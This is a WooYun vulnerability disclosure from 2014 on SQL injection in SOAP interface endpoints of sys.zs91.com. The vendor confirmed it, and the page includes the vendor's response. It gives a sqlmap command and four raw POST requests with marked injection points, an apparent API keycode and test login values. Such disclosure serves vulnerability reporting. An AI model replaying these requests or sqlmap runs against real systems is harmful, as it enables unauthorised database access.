当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074768

漏洞标题:网聚天下移动互联SQL注入

相关厂商:cmiea.org

漏洞作者: 啊L川

提交时间:2014-09-02 17:18

修复时间:2014-10-17 17:20

公开时间:2014-10-17 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-02: 细节已通知厂商并且等待厂商处理中
2014-09-04: 厂商已经确认,细节仅向厂商公开
2014-09-14: 细节向核心白帽子及相关领域专家公开
2014-09-24: 细节向普通白帽子公开
2014-10-04: 细节向实习白帽子公开
2014-10-17: 细节向公众公开

简要描述:

厂商确认很快呀!整理了几个部分接口 还是存在SQL注入

详细说明:

python sqlmap.py -r abc.txt --dbms=mysql --dbs abc.txt内容为code代码

1 mtype字段

POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 430
Connection: keep-alive
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<doAct xmlns="http://sys.zs91.com">
<args>{"keycode":"hxRN98VARF1BYUXo","AccountID":"282","page":"1","mtype":"865'"}</args>
<operate>getmessinfo</operate>
</doAct>
</soap:Body>
</soap:Envelope>


QQ20140902-1@2x.png


2 插入数据处

POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 524
Connection: keep-alive
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<doAct xmlns="http://sys.zs91.com">
<args>{"TitleName":"全部","IpAddress":"","ParentId":"805*","CreateDate":"2014-09-02 14:06:19","AccountID":"282","PhoneType":"2","TitleId":"1056","keycode":"hxRN98VARF1BYUXo"}</args>
<operate>flowcount</operate>
</doAct>
</soap:Body>
</soap:Envelope>


QQ20140902-2@2x.png


3 登录功能

POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 447
Connection: keep-alive
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<doAct xmlns="http://sys.zs91.com">
<args>{"AccountID":"282'","username":"13311111111","userpass":"111111","keycode":"hxRN98VARF1BYUXo"}</args>
<operate>chklogin</operate>
</doAct>
</soap:Body>
</soap:Envelope>


QQ20140902-3@2x.png


POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 464
Connection: keep-alive
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<doAct xmlns="http://sys.zs91.com">
<args>{"type":"0","MemberID":"1","AccountID":"282","page":"1","stype":"0","ShopId":"895'","keycode":"hxRN98VARF1BYUXo"}</args>
<operate>gqlist</operate>
</doAct>
</soap:Body>
</soap:Envelope>


QQ20140902-4@2x.png

漏洞证明:

QQ20140902-5@2x.png

修复方案:

对获取得参数过滤

版权声明:转载请注明来源 啊L川@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-09-04 15:27

厂商回复:

正准备安排时间处理?

最新状态:

暂无